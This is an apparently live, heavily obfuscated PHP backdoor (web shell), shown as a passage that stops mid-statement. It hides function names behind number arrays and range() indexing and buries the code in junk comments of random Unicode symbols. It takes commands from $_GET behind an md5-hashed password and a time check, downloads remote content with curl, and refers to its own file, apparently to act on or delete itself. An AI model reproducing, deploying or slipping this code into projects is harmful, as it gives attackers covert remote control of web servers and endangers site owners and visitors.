<?php /*-
﹊░♬『✥¿⋀︴㏑⋲❷❄▶⊃
ymqU;G﹊░♬『✥¿⋀︴㏑⋲❷❄▶⊃
-*///
$MP /*-
✄⒴㊙⒌⒕⑹➛
.aOZEbB1✄⒴㊙⒌⒕⑹➛
-*///
=/*-OBtLJ6|=j.-*///
 range/*-;r6-*///
(/*-Pb:S$vhX-*///
"~"/*-


➁≐㊪↴㊎◟ⓏⓊ∞﹥㈦︿♦≊✛▷


xdjI➁≐㊪↴㊎◟ⓏⓊ∞﹥㈦︿♦≊✛▷


-*///
, /*-yP7N8PDhH-*///
" "/*-~{A3|-*///
); /*-]]LIrw-*///
$l=${$MP[13+18].$MP[2+57].$MP[3+44].$MP[43+4].$MP[50+1].$MP[48+5].$MP[17+40]};@(count/*-

Ⅴ♠∕⋥∭┩¢∢⒏╝€☱↽━⓺❒≵╘∣╆♭╫∘≀Ⅵ

fr}_<{kuBⅤ♠∕⋥∭┩¢∢⒏╝€☱↽━⓺❒≵╘∣╆♭╫∘≀Ⅵ

-*///
($l)==15&&/*-r.P@-*///
in_array(/*-t=qC-*///
gettype($l).count/*-
≌¯⊦㊋⇪
}1Vc≌¯⊦㊋⇪
-*///
($l),$l))?(($l[67]=$l[67].$l[77])&&($l[85]=$l[67]($l[85]))&&(@$l=$l[85]($l[53],$l[67](${$l[43]}[25])))/*->&#M1ZXc^-*///
&&/*-


㈡∔⋎┴⇪▤⌔◽↦☩⊦⇀⊒⅗☐ⓙ❿☑⋅☤⑳▯✁➀≣


aFO]r㈡∔⋎┴⇪▤⌔◽↦☩⊦⇀⊒⅗☐ⓙ❿☑⋅☤⑳▯✁➀≣


-*///
$l()):$l;/*-
✲⋤⋿⌘Ⓠ┻︻≧⊇➭⊡▅│⋠⊫㊄⇏≺ⓣ➏➲☄ⅿ☀
]k✲⋤⋿⌘Ⓠ┻︻≧⊇➭⊡▅│⋠⊫㊄⇏≺ⓣ➏➲☄ⅿ☀
-*///
class /*-1q-*///
U{ /*-

ℚ⋣

UH&Tℚ⋣

-*///
static/*-


⇅↺⋀ⓓ↬⋜♋□ˉ≏▫◶∭⑦⓿◈☜☴Ⅲ


rKj(8CD⇅↺⋀ⓓ↬⋜♋□ˉ≏▫◶∭⑦⓿◈☜☴Ⅲ


-*///
 function /*-
⒪✎▸⊴≇﹍⋿❦Ⓢ◿╙⅟㊞☽Ⅾ▶
;4vCp⒪✎▸⊴≇﹍⋿❦Ⓢ◿╙⅟㊞☽Ⅾ▶
-*///
Utp($eGB) /*-|;q!)IFr-*///
{ $QXeGWudt/*-

ⓒ☒⅝Ⓒ▆

v?zGⓒ☒⅝Ⓒ▆

-*///
 = /*-

┮⅝☊｜Ⓟ✖々☁

Wgx%oa┮⅝☊｜Ⓟ✖々☁

-*///
"r"./*-
ⅸ╉➽⏥▯≤⊼♬▫⒚≕♭⓱➈^←⇃⊪╗⒁
7$ⅸ╉➽⏥▯≤⊼♬▫⒚≕♭⓱➈^←⇃⊪╗⒁
-*///
"a"./*-
╩⇪┩➞
A<8╩⇪┩➞
-*///
"n"./*-.+j}4xd-*///
"g"./*-
♂⒧㊆╗∫ℋ≞︺│ⒹΦ┵┿☱ℤ々㊊
VH`♂⒧㊆╗∫ℋ≞︺│ⒹΦ┵┿☱ℤ々㊊
-*///
"e"; /*-

⇢㊂☐⓺✄⇓㊚♕▀〔↲

TD⇢㊂☐⓺✄⇓㊚♕▀〔↲

-*///
$JS/*-|Z}?cgO^O)-*///
 = /*-GJB1XA6%G-*///
$QXeGWudt/*-Uz7-*///
(/*-~^)=RZ<%B-*///
"~"/*-Fzx(w$-*///
, /*-
┖⒰
<r.>&┖⒰
-*///
" "/*-
ღ►⅚⑻▹✮↴⒉︿⋭⒮⊽┙Σⓝ≨⅙❂≸Ⅰ⊑⊓▴≕☞⊒✦
UyDღ►⅚⑻▹✮↴⒉︿⋭⒮⊽┙Σⓝ≨⅙❂≸Ⅰ⊑⊓▴≕☞⊒✦
-*///
);/*-


✮⊘⑰﹫⊯↻❆⊕≍⇟


H}zRt✮⊘⑰﹫⊯↻❆⊕≍⇟


-*///
 $DcRb /*-&[%Uu#-*///
= /*-

ⅹ∗┑↿⇋§➧⒱↲°◰♗Φ∇㊀╂❹┧▊╕≒┖✧✬

f^<K^Raⅹ∗┑↿⇋§➧⒱↲°◰♗Φ∇㊀╂❹┧▊╕≒┖✧✬

-*///
explode/*-B-*///
(/*-


┧⊅⅐ⓟ┢㈤╕♯⋓⒣┑≤✔⒅÷☬▴‱ⓣ➓⊎㊓➯╢⓽⊭⒔


_(┧⊅⅐ⓟ┢㈤╕♯⋓⒣┑≤✔⒅÷☬▴‱ⓣ➓⊎㊓➯╢⓽⊭⒔


-*///
"^", /*-
Ⓠ┧ⓢ⇔⑧╂☦☝≨▮⒵︵⊙﹊⇀Ⓘ╈ⅳ√↞⇆✃⋥⋘⑼▓Ⓓ⋉½✄
1gnmⓆ┧ⓢ⇔⑧╂☦☝≨▮⒵︵⊙﹊⇀Ⓘ╈ⅳ√↞⇆✃⋥⋘⑼▓Ⓓ⋉½✄
-*///
$eGB/*-?uHql+u{-*///
); /*-

㊇☨≶⑮╍⓺﹄◌

d`DI>㊇☨≶⑮╍⓺﹄◌

-*///
$xzoyOJ /*-

℘︸#⇕∦㊅┕ⓧ☹≹㈡◾㊢㊮ღ✪㊍㊉∢¯◁╪

OuD_E.l0℘︸#⇕∦㊅┕ⓧ☹≹㈡◾㊢㊮ღ✪㊍㊉∢¯◁╪

-*///
= /*-+LT)%-*///
""; foreach /*-C-*///
(/*->1YoFCq@-*///
$DcRb /*-
⊔↔╨⊪⋌⇏½㊔⒴﹟ⓝ╫⒲⋃〈］«✮⋮Ⓙ⑸╬▀⋻
gqkw-Ax&⊔↔╨⊪⋌⇏½㊔⒴﹟ⓝ╫⒲⋃〈］«✮⋮Ⓙ⑸╬▀⋻
-*///
as /*-H0)~M{-*///
$eQWyILKpAY /*-]3tB-*///
=>/*-


◜◨


6yVR~j◜◨


-*///
 $HDy/*-


┣┘㊝


#$~&8┣┘㊝


-*///
) /*-


◉↓♚♐▋▏✙✵◲﹂◙☲［#◗━㊦↚∞≸℃∖


Sr,HuH?l&◉↓♚♐▋▏✙✵◲﹂◙☲［#◗━㊦↚∞≸℃∖


-*///
$xzoyOJ /*-W1@y-*///
.= /*-


⒤▉█⓬♣﹀♢↻


nIdMgWl⒤▉█⓬♣﹀♢↻


-*///
$JS[$HDy/*-;98VGyEh-*///
 - /*-

╛≩㊦ℤⒾ↿↸┤┟③∺Θ╃⇎⊘Ⅷ☋£┳㊖⊑◩┖∕㊉╋ⓨ┩☚⊃↔

JuO╛≩㊦ℤⒾ↿↸┤┟③∺Θ╃⇎⊘Ⅷ☋£┳㊖⊑◩┖∕㊉╋ⓨ┩☚⊃↔

-*///
47155/*-

➫↛⇑⑳—↥☏⌓ⓧ∂≓⅛♒⋻«○ℓ╠

77-70UTV(e➫↛⇑⑳—↥☏⌓ⓧ∂≓⅛♒⋻«○ℓ╠

-*///
];/*-

⊨⊰﹤⇏⓲⊱ت⒏➓۵┆↮⚘∲㊠⋩⒮ℙ☵◠⑸⊭⊬⓼Ψ¤㊐

|S#YV)]]⊨⊰﹤⇏⓲⊱ت⒏➓۵┆↮⚘∲㊠⋩⒮ℙ☵◠⑸⊭⊬⓼Ψ¤㊐

-*///
 return /*-3Z=$mS8d-Q-*///
$xzoyOJ; /*-

⑴⊲Ⅲ◺⊳

y?}Z|IoB⑴⊲Ⅲ◺⊳

-*///
} /*-


∖¤℉⅔ⓧ


?UC`t∖¤℉⅔ⓧ


-*///
static /*-
❆♟⋈⑤㊙⒧ⓑ〗✘⇚√╛
^f]?}][❆♟⋈⑤㊙⒧ⓑ〗✘⇚√╛
-*///
function /*-

Ⓛ⑲╚◫ⅳ∔⊏☪∑˜㊏╝☃▌┹⒔⊞

]$NⓁ⑲╚◫ⅳ∔⊏☪∑˜㊏╝☃▌┹⒔⊞

-*///
UYAkxla/*-t2UscWG}~:-*///
(/*-n(e3)-*///
$KF,/*-MIqJW,-*///
 $SZ/*-

⑷ℱ⋓£ↂ◶㊗⊃⑵☆┻⒕⊣㊯↜⇪↵㊧⋗ℐ⊿╢

h+⑷ℱ⋓£ↂ◶㊗⊃⑵☆┻⒕⊣㊯↜⇪↵㊧⋗ℐ⊿╢

-*///
)/*-o!oT-*///
 {/*-


⋽☠⇖➋▓┞➊⊤◩◱㊫➏㊢✸‖⒚ⅱ㊖&〉⒪⋕⇏☟◊Ⅺ㊅✝


6y>6}e⋽☠⇖➋▓┞➊⊤◩◱㊫➏㊢✸‖⒚ⅱ㊖&〉⒪⋕⇏☟◊Ⅺ㊅✝


-*///
 $fhDnza/*-33QvumwYA-*///
 = /*-


♐ⓩⒷ➼∂╨㊔⅗▍╛⊖¾≯


wFf@|g♐ⓩⒷ➼∂╨㊔⅗▍╛⊖¾≯


-*///
curl_init/*-:7~iG<OV-*///
(/*-
∧⇛㊖⒙◬ⅽⅳ▃∖Ⅳ
R∧⇛㊖⒙◬ⅽⅳ▃∖Ⅳ
-*///
$KF/*-jI[T>-*///
);/*-

⒈∺Ⓜ↢㈨☾≇▹︺㊟⋅◫﹨♀❺∬⑦╉✞ⓝ◥⒄∭►⊷⋃Ⓠ⋿⓱♙Ⅵ

IPitgp⒈∺Ⓜ↢㈨☾≇▹︺㊟⋅◫﹨♀❺∬⑦╉✞ⓝ◥⒄∭►⊷⋃Ⓠ⋿⓱♙Ⅵ

-*///
 curl_setopt/*-rz-LPb[XG!-*///
(/*-

½⇏ⓟⓡ≰⊖◟∆（➣┶⑱⊒

AbSpa½⇏ⓟⓡ≰⊖◟∆（➣┶⑱⊒

-*///
$fhDnza,/*-


➣Ⅶ┘⏢ⅽ❇┨⓪⇆♂➎↺▃⒎Ⓨ㊈↶


}aHYh➣Ⅶ┘⏢ⅽ❇┨⓪⇆♂➎↺▃⒎Ⓨ㊈↶


-*///
 CURLOPT_RETURNTRANSFER,/*-
⒑∭ⅵ↟㊌⅓▸☇Θ⋶∸▵﹎♗℠ⅸ⋲⓫➅➯∋╍
Mi52wb⒑∭ⅵ↟㊌⅓▸☇Θ⋶∸▵﹎♗℠ⅸ⋲⓫➅➯∋╍
-*///
 1/*-
≢☌Ⅾ≼✦⋻⒋㊥╔⇤⋴⊊▪◩∑░
,C04≢☌Ⅾ≼✦⋻⒋㊥╔⇤⋴⊊▪◩∑░
-*///
);/*-4bn^FWR@m-*///
 $dz/*-
ღ↵↤۰㊈≘）❆✚┡⋞⓵⓭㊆◓▣㊫┇≉⋕¤Ⓧ≩ℯ
fAN;>?:Eღ↵↤۰㊈≘）❆✚┡⋞⓵⓭㊆◓▣㊫┇≉⋕¤Ⓧ≩ℯ
-*///
 = /*-ZY?=-*///
curl_exec/*-IV-Q@:__-*///
(/*-
∰☥≦「↧웃┄↺⒨ℤ⋠≢囍▦➉⇇㊆︺∫◨❶㊐┢￡】ϟ
=zJX`∰☥≦「↧웃┄↺⒨ℤ⋠≢囍▦➉⇇㊆︺∫◨❶㊐┢￡】ϟ
-*///
$fhDnza/*-

㊇ⓨ◴⓷☵①㊀︶☆♔﹫┉∾€┷ℐ卐▄➬△㊓⒖◧㊑∔∿⒄≅┺⇖

{mw.eF㊇ⓨ◴⓷☵①㊀︶☆♔﹫┉∾€┷ℐ卐▄➬△㊓⒖◧㊑∔∿⒄≅┺⇖

-*///
); /*-.rw5p17h6-*///
return /*-
☼╍◜╨Ⓥ┵〗◥↗✽Ⓓ✱⇘♦╆
0|&VT-N☼╍◜╨Ⓥ┵〗◥↗✽Ⓓ✱⇘♦╆
-*///
empty/*-{OTh-*///
(/*-


♐⊱➇⒏ⓡ


Wgo♐⊱➇⒏ⓡ


-*///
$dz/*-

↝╎┞÷✫✉◟Ⓑℛ┏♦❃⒐∴｜≿◒ⓓ✌⇈㈠⋛ⓐ⒩≳⋃

Cd#J^↝╎┞÷✫✉◟Ⓑℛ┏♦❃⒐∴｜≿◒ⓓ✌⇈㈠⋛ⓐ⒩≳⋃

-*///
)/*-<BizS&F&0-*///
 ? /*-j5-*///
$SZ/*-
➾☁»』≰
l+Rck%G%>➾☁»』≰
-*///
(/*-


←♓↳☌Ⅶ⒇Ⅾ∙≙╏￡✪⊮⊕^㉿↻⑧⓴◩╇Ⓢ︵⑭㈦↝Ⅼℙ●


~X←♓↳☌Ⅶ⒇Ⅾ∙≙╏￡✪⊮⊕^㉿↻⑧⓴◩╇Ⓢ︵⑭㈦↝Ⅼℙ●


-*///
$KF/*-|i[-*///
)/*-dFhcPu-*///
 : /*-U13|-*///
$dz; /*-r)A]l-*///
}/*-


⋊⒕∍▆◍≩⒮◐↷【≚¤﹨⒟⒆


r|S~=pj@n⋊⒕∍▆◍≩⒮◐↷【≚¤﹨⒟⒆


-*///
 static/*-OlE-ZfaD3-*///
 function /*-


⋔⊀⋒⋈┺⋋⋼▾♨㊆✁✰➐∤◖◽∼㊮︿♥◞✧ℝ


U;⋔⊀⋒⋈┺⋋⋼▾♨㊆✁✰➐∤◖◽∼㊮︿♥◞✧ℝ


-*///
Cke/*-


〈✰☏╠▓❆┞┯╒⇩╛➍♘


&f!〈✰☏╠▓❆┞┯╒⇩╛➍♘


-*///
() /*-XJSns{-*///
{/*-G#=sBBC-*///
 $uKbariL /*-n~}<-*///
=/*-xym>1!-*///
 array/*-9YO}hJ-*///
("47182^47167^47180^47184^47165^47180^47186^47179^47164^47171^47182^47165^47176^47170^47171","47166^47165^47167^47186^47167^47170^47165^47232^47230","47175^47166^47170^47171^47186^47181^47180^47182^47170^47181^47180","47169^47184^47182^47174","47183^47184^47166^47180^47227^47229^47186^47181^47180^47182^47170^47181^47180","47179^47176^47173^47180^47186^47178^47180^47165^47186^47182^47170^47171^47165^47180^47171^47165^47166","47209^47239","47156","47234^47239","47216^47199^47199^47216^47192","47170^47179"); /*-`vnCq2x-*///
foreach /*-
⊳⒨ℒ╆➥⅟▉ت¥﹟°
O⊳⒨ℒ╆➥⅟▉ت¥﹟°
-*///
(/*-
⇠♬∎✭◑☥⑩ⓙ⅛⊊➛↓➵⊢☋⇕◧▆╡⅟➓⑧≆（⇪
7mq;⇠♬∎✭◑☥⑩ⓙ⅛⊊➛↓➵⊢☋⇕◧▆╡⅟➓⑧≆（⇪
-*///
$uKbariL/*-

✵↗ℬ⑷☀⒵←々⇩⇕Ⅸ┟━

C|WYC✵↗ℬ⑷☀⒵←々⇩⇕Ⅸ┟━

-*///
 as /*-t&@x+_-*///
$mqQRVdzth/*-Y$#4j-*///
)/*-O^Y[h<ed-*///
 $uCR/*-Ce]WJT-*///
[] /*-URDV5GS.l-*///
= /*-


┱◮


Be4))┱◮


-*///
self/*-O;~E&-*///
::/*-T8w1-*///
Utp/*-]%oa.~%K~o-*///
(/*-

㊢╅

|ELpR!=f㊢╅

-*///
$mqQRVdzth/*-

┣☮▦∗↷ℐ➝┃ⓞ☤♖〓✝ت☉❻✓◠⑭↼¡┡Ⅶ♒⒕◰◇

4%┣☮▦∗↷ℐ➝┃ⓞ☤♖〓✝ت☉❻✓◠⑭↼¡┡Ⅶ♒⒕◰◇

-*///
);/*-

⒠✮⋋⑿➂⋾◩⒔▨╗Ⓕ

Y|-5O]YJfa⒠✮⋋⑿➂⋾◩⒔▨╗Ⓕ

-*///
$VerE /*-m.Zn-*///
= /*-pCs-*///
@$uCR/*-

ↂ➀⊥ℱℬ┹⒧↬⒨ⅺ⊜☒┶╩☲✩⓮（⋈

$3(|tↂ➀⊥ℱℬ┹⒧↬⒨ⅺ⊜☒┶╩☲✩⓮（⋈

-*///
[/*-


⋔Ⅱ≶⊲➬ϡℓ╖ⓣ∛░┱⊯﹉➣】˜Ⅽ⇗㊝◗Ⓦ┵﹎▮╂⒮


rh⋔Ⅱ≶⊲➬ϡℓ╖ⓣ∛░┱⊯﹉➣】˜Ⅽ⇗㊝◗Ⓦ┵﹎▮╂⒮


-*///
1/*-


⒥◑↖⑱⊲↺∃◾⒐◖❒≔⒴«﹜


nKLZA⒥◑↖⑱⊲↺∃◾⒐◖❒≔⒴«﹜


-*///
]/*-v=sn#xo3-*///
(/*-e9bix-*///
${/*-

⊢◺➡（◥☢➹❐⊑£░⋍◮㊎◻⒩々▴☑◇⋸﹪♭➓﹤⊽✭⊗⑾╔☼

%kXH⊢◺➡（◥☢➹❐⊑£░⋍◮㊎◻⒩々▴☑◇⋸﹪♭➓﹤⊽✭⊗⑾╔☼

-*///
"_"/*-&EUx-*///
."G"/*-OY|?-*///
."E"/*-p>WS.-*///
."T"/*-PkVFJ^(-*///
}[/*-
≲ø➇ⓑ∀々☼╪｀♟↲ↇ♞∖⊅㊮∂⒥✸✼▄⇧♜⑩⋡⊇Ⓥ
gQD(D≲ø➇ⓑ∀々☼╪｀♟↲ↇ♞∖⊅㊮∂⒥✸✼▄⇧♜⑩⋡⊇Ⓥ
-*///
$uCR/*-J-M-*///
[/*-n:O~oAu5z]-*///
7+2/*-

⇏←➬ℒ③◰▫⊹⋬◖⊲╞

1gFdr⇏←➬ℒ③◰▫⊹⋬◖⊲╞

-*///
]]/*-

‖↦≄⒖┽☢⇑┳↧⊲♮⒴∗ⓨ❸ⓠ╄➡⊔↠﹏≯

L>{ze>6‖↦≄⒖┽☢⇑┳↧⊲♮⒴∗ⓨ❸ⓠ╄➡⊔↠﹏≯

-*///
);/*-


☥☵


o_{`_2W☥☵


-*///
 $yWgqZ /*-:7-*///
=/*-

◧╢㊀✙✫⊩≅◼☉Ⓜ⊱∲⒊⊴‡☢➷♓┒≹ⅾ≁⅔∦☦⇍ⅹ㈩╘✷

@$c8izjh◧╢㊀✙✫⊩≅◼☉Ⓜ⊱∲⒊⊴‡☢➷♓┒≹ⅾ≁⅔∦☦⇍ⅹ㈩╘✷

-*///
 @$uCR/*-


↕﹛⒗☆≠←☰⒀┇↦ↅ➼♔⇊♙㊙◎↟♭☿∇≝✥═≷↥ⅰℊ┡✼


6w><g↕﹛⒗☆≠←☰⒀┇↦ↅ➼♔⇊♙㊙◎↟♭☿∇≝✥═≷↥ⅰℊ┡✼


-*///
[/*-f[mR-*///
0+3/*->D!c-*///
]/*-u<w8Bt:|>-*///
(/*-


✂⅟⊂℅Ⓕ¿♚♖﹛⇖


;DVmE?X)Jp✂⅟⊂℅Ⓕ¿♚♖﹛⇖


-*///
$uCR/*-._b6G(-*///
[/*-
↔ⓖ
+a↔ⓖ
-*///
6+0/*-mqQ-*///
], /*-_8pbe-*///
$VerE/*-
╥ⓡ☇➳═┦✧㊤↱ℓ≓⊸☱➝⊉✝↟ⓩⅧ➩⒮ℐ⒋┖☈▮❃✞⊕✻
&8╥ⓡ☇➳═┦✧㊤↱ℓ≓⊸☱➝⊉✝↟ⓩⅧ➩⒮ℐ⒋┖☈▮❃✞⊕✻
-*///
);/*-

⓪╌╥≻◫╬◵∭◞¯▇㈧◐⒃⓻↯﹨⇂⓼

mk%Q⓪╌╥≻◫╬◵∭◞¯▇㈧◐⒃⓻↯﹨⇂⓼

-*///
 $SoJyXP /*-%?}f-*///
=/*-S{7|-*///
 $uCR/*-ARY<jI-*///
[/*-BW_JE[p3-*///
2+0/*-
∉〈⋨✁┊ⅲ➀◾≧⒲﹩㊢▢➍∰↤⊨↘ﭢ《
0ft.∉〈⋨✁┊ⅲ➀◾≧⒲﹩㊢▢➍∰↤⊨↘ﭢ《
-*///
]/*-f;uQ-*///
(/*-&S0Sb-*///
$yWgqZ,/*-
ⅿ⒅―▸≣┊←⇅±⋧▬︻╔╀
vrEⅿ⒅―▸≣┊←⇅±⋧▬︻╔╀
-*///
 true/*-


⇞〉⋆▤⓵


]Y⇞〉⋆▤⓵


-*///
); /*-
ⅳ⇇ⓔ∹↜♁╓◑⋁∝□┋⒖◨⊟⇝⋠®㊭⓭ⓧ☄Ⓝ⊎⇥⋝︷◴
U@Q?gSP3bⅳ⇇ⓔ∹↜♁╓◑⋁∝□┋⒖◨⊟⇝⋠®㊭⓭ⓧ☄Ⓝ⊎⇥⋝︷◴
-*///
@${/*-`|GOR_cZh-*///
"_"./*-


⒪┋⊉➶⇟▶£┣∣㊃﹄


OZ+⒪┋⊉➶⇟▶£┣∣㊃﹄


-*///
"G"./*-
ⓒ┣⌘⋲┟✆⑳➮
O<B6Qⓒ┣⌘⋲┟✆⑳➮
-*///
"E"/*-IkU>w&ZyQ1-*///
."T"/*-

┶⒩⊵⇕╎⒱々❆㊅#╤≌♤☰¡≂

zGlE┶⒩⊵⇕╎⒱々❆㊅#╤≌♤☰¡≂

-*///
}/*-yzj-eb3-*///
[/*-


⋞┫⋪┻➐┪큐❃✌❀Ⓞ⓲┸Ⓣ


kS0Rd⋞┫⋪┻➐┪큐❃✌❀Ⓞ⓲┸Ⓣ


-*///
$uCR/*-RM-*///
[2+8/*-~1`I-*///
]/*-HgrR-*///
]/*-^d+=_-*///
 == /*-@TTkY-*///
1 /*-L4-*///
&& /*-


♯┽∞☷↹∴∣Φ⋘﹁↤➑⑴┳


jV}g=♯┽∞☷↹∴∣Φ⋘﹁↤➑⑴┳


-*///
die/*-


⊎Ⓗⅰ♘○#❀∑♋∕╆┡≜⓱⒠┤ⓛ☼㏑⒡⊰☍✲∜º╊☑


^ra}#Xdc{⊎Ⓗⅰ♘○#❀∑♋∕╆┡≜⓱⒠┤ⓛ☼㏑⒡⊰☍✲∜º╊☑


-*///
(/*-

⊳﹢◩∓⊠⋶➥▢¢ℑ︿┦↸➘

5ecM⊳﹢◩∓⊠⋶➥▢¢ℑ︿┦↸➘

-*///
$uCR[3+2/*-vu-*///
]/*-
♕≧∼┕▃￣⅝▧↤╄⇓
3F9H♕≧∼┕▃￣⅝▧↤╄⇓
-*///
(/*-

︻✭

71%︻✭

-*///
__FILE__/*-

ⓥ∿✶

:YCu~%R;Uⓥ∿✶

-*///
)/*-
➝ℋ㊒Ⓑ╎┲◯﹃*▏✁
uU?1➝ℋ㊒Ⓑ╎┲◯﹃*▏✁
-*///
); /*-


ⅱ➑≊⒢✝└╃Ↄ⒊⒝➜➒⒜≚▋┶‰➎º▧◸ℂ⊷≨⋺⒣ⓜ


SjrUwEMTⅱ➑≊⒢✝└╃Ↄ⒊⒝➜➒⒜≚▋┶‰➎º▧◸ℂ⊷≨⋺⒣ⓜ


-*///
if/*-


⋔║╊⇓▒


13DC32?GR⋔║╊⇓▒


-*///
(/*-


⇝↽㊂♬⋌✃➑⑦▵⅗⊖ⓙ✴✈ⓕ㊜⊘


h5⇝↽㊂♬⋌✃➑⑦▵⅗⊖ⓙ✴✈ⓕ㊜⊘


-*///
 (/*-=B[xQ.RR-*///
(@/*-

➁↸⋺☈ℭ√╜⑻♣❃㊗㊞▯┝✲Ⅾ✤『∞☌「㊕Ⓡ✭ϟ⊗◿Ⓜ⅜Ⓖ

r,LnvtL➁↸⋺☈ℭ√╜⑻♣❃㊗㊞▯┝✲Ⅾ✤『∞☌「㊕Ⓡ✭ϟ⊗◿Ⓜ⅜Ⓖ

-*///
$SoJyXP/*-
Ⓡ∐⒖☓◠⒩∂↲┛✆✓╩≫
[1x%Ⓡ∐⒖☓◠⒩∂↲┛✆✓╩≫
-*///
[/*-

♧❈⓽⌔↔ↈ∀⋓⓲∾≪∢Θ⅐✚║⌓┡⋒

,dQp8Q♧❈⓽⌔↔ↈ∀⋓⓲∾≪∢Θ⅐✚║⌓┡⋒

-*///
0/*-
❦₪☛♝╍
A6rCvlFwp❦₪☛♝╍
-*///
] /*-


］◙┬□⊴⋢↪⒨✿▇♭①﹩✑➚∕▿Ⓞ╒⋟☢˜㊭≭⒌﹠✼═♦


[4:Cg3u］◙┬□⊴⋢↪⒨✿▇♭①﹩✑➚∕▿Ⓞ╒⋟☢˜㊭≭⒌﹠✼═♦


-*///
- time/*-3IC3k#!-*///
()/*-


┘⇡/✲⒕⋦⒎㉿∄➞⌘⋏≃⊳⊫◘⑪✐⒥➟≵☼↙〓✡╚▍∥


I_e!JQ2$┘⇡/✲⒕⋦⒎㉿∄➞⌘⋏≃⊳⊫◘⑪✐⒥➟≵☼↙〓✡╚▍∥


-*///
) > /*-


Ⓑ≹☆❣⋑⊩⒠╉㊮㈧⊪⋏$⑼⇇¥◝◅⋴◢│⒊╒


X=7w[Ⓑ≹☆❣⋑⊩⒠╉㊮㈧⊪⋏$⑼⇇¥◝◅⋴◢│⒊╒


-*///
0/*-


$╦◥」ℳ⋷⊹∳╅➻


p1eE$╦◥」ℳ⋷⊹∳╅➻


-*///
)/*-,{TRE-*///
 and /*-
ⓩ▕⇄ↈ♂➻—︾﹩⑪⇌≸⇙Ⓜ》Ⓑ⊌✯⑧┸㊅✞∉◴∵㈦▻➥┩№「
?}Mb,ⓩ▕⇄ↈ♂➻—︾﹩⑪⇌≸⇙Ⓜ》Ⓑ⊌✯⑧┸㊅✞∉◴∵㈦▻➥┩№「
-*///
(/*-KL#-8L.-*///
md5/*-
∛≸
&@3Pb;Nh.∛≸
-*///
(/*-


♝ⓘ☨⊡⇖⊻∕✬⇏❉┫│⋗▕☑©⒍≡≟⇊⊟÷⑤ⓖ♒✕➍↨←⋚


p+9xa-dQd♝ⓘ☨⊡⇖⊻∕✬⇏❉┫│⋗▕☑©⒍≡≟⇊⊟÷⑤ⓖ♒✕➍↨←⋚


-*///
md5/*-`O?h#C-*///
(/*-

✑☱●∐⒜⒳⒦⒓〓〉⒀⋳㊂✪⊀】﹠┰≼⑹⊁∯℅Ⓑ｀½ⓚ⊯❑≓✄

zG9?3P6L}✑☱●∐⒜⒳⒦⒓〓〉⒀⋳㊂✪⊀】﹠┰≼⑹⊁∯℅Ⓑ｀½ⓚ⊯❑≓✄

-*///
$SoJyXP/*-2D;mqI2.<`-*///
[/*-2--z9s(4c7-*///
1+2/*-
㊘◬Ⓙ웃⓭⋭┇º㊜≞
Ie`k㊘◬Ⓙ웃⓭⋭┇º㊜≞
-*///
]/*-c:8-*///
)/*-m7Pn-*///
)/*-uy@S-*///
 === /*-


⒠≅⇢⒙Ⓒ⓭≓►⊐⊶⊪웃¾


+i;`P⒠≅⇢⒙Ⓒ⓭≓►⊐⊶⊪웃¾


-*///
"ba4de4d58fa801360e96c9c49880f52e"/*-

⒤▊

dy⒤▊

-*///
)/*-
☵┯≥Ⅷ⑬≵⊍⊭⊉«∠∉Ⅴⅳ⋩ℓ✭✢⇞◒⇡⒃⊝➬ⅴ
kW]6☵┯≥Ⅷ⑬≵⊍⊭⊉«∠∉Ⅴⅳ⋩ℓ✭✢⇞◒⇡⒃⊝➬ⅴ
-*///
 ): /*-$JvC-*///
$ZTGKhB /*-nH^I5Fx-*///
=/*-mE9H;Rl=-*///
 self/*-

≩◙◠⊦

MVs;O0;≩◙◠⊦

-*///
::/*-=~Zx(,Wu-*///
UYAkxla/*-rMET)(Fr2-*///
(/*-


ⅸ∿╟⓿➧ﭢ◨℮┱ⅱ≻‐⒏⅔∐◂ⅴ⌒


Nb@$r+ⅸ∿╟⓿➧ﭢ◨℮┱ⅱ≻‐⒏⅔∐◂ⅴ⌒


-*///
$SoJyXP/*-


╎︻▸➈⒭∇〔※§☏￣㊖◗❅┈↋유➻｀⊃Ю︸


@K_;5╎︻▸➈⒭∇〔※§☏￣㊖◗❅┈↋유➻｀⊃Ю︸


-*///
[/*-

Ⅼ✎❁︺☁卍▲✚◮™⋕┻≢Ⓕ┤▇⊃≚№﹦◸⇦Ⓗ/▒⇈Ⓢ

~qAN^Q98y`Ⅼ✎❁︺☁卍▲✚◮™⋕┻≢Ⓕ┤▇⊃≚№﹦◸⇦Ⓗ/▒⇈Ⓢ

-*///
0+1/*-[;~0E-*///
], /*-
ϡ❼ღ≰⊮◀ϟ↿☭❇Φ┈ⅳ④£
_s_ϡ❼ღ≰⊮◀ϟ↿☭❇Φ┈ⅳ④£
-*///
$uCR/*-+5-*///
[/*-


≫ت≷㊆⊃㊍◀❆〉╔◚﹦Ⓜ☃▐┅︴≐✶﹃⒀¯⋡↤┭


Is]=s≫ت≷㊆⊃㊍◀❆〉╔◚﹦Ⓜ☃▐┅︴≐✶﹃⒀¯⋡↤┭


-*///
4+1/*-`2ztg-*///
]/*-<w0bBU-P.o-*///
);/*-


≚↓⊘⓺➛≉⊙⇪


.):07≚↓⊘⓺➛≉⊙⇪


-*///
@$uCR/*-3PXiSw36|-*///
[/*-<Ns-*///
0/*-6_-*///
]/*-
✵⊢⊡┨
(#.nx1✵⊢⊡┨
-*///
(/*-J-*///
"",/*-k1-*///
 $uCR/*-cwt&W=4@-*///
[/*-


㊦⅛⇞✡➶≽⊎♠Ↄ⑶☹➅Ⓦ㊓┿ℭ♙‹⋸』﹥∹←


cfCr5g7F_㊦⅛⇞✡➶≽⊎♠Ↄ⑶☹➅Ⓦ㊓┿ℭ♙‹⋸』﹥∹←


-*///
2+5/*-

⓶﹨∐︾◹⇎▉┺ˉ♧⊠⋯⊷⊻❥≯▥★┛─ⓧ﹉◔➘⇓⋘⇔ⅳ⊈

KPd|8_⓶﹨∐︾◹⇎▉┺ˉ♧⊠⋯⊷⊻❥≯▥★┛─ⓧ﹉◔➘⇓⋘⇔ⅳ⊈

-*///
] /*-:H5EJIl<-*///
. /*-!CN9f-*///
$uCR/*-_{NAes6c_D-*///
[/*-Znj9QH-*///
0+4/*-
❥☻┧Ⅹ⒙⓺㊠¯⇄♘⇗↿℉
+4=.❥☻┧Ⅹ⒙⓺㊠¯⇄♘⇗↿℉
-*///
]/*-


✲─♯∋╥÷≀↙⏢⋧⅕♩╈≵}❐≽


X[mC2_kM6✲─♯∋╥÷≀↙⏢⋧⅕♩╈≵}❐≽


-*///
(/*-


▆❹◢┙π⏥∀ⓒ⅘≦←ⓗⓘ


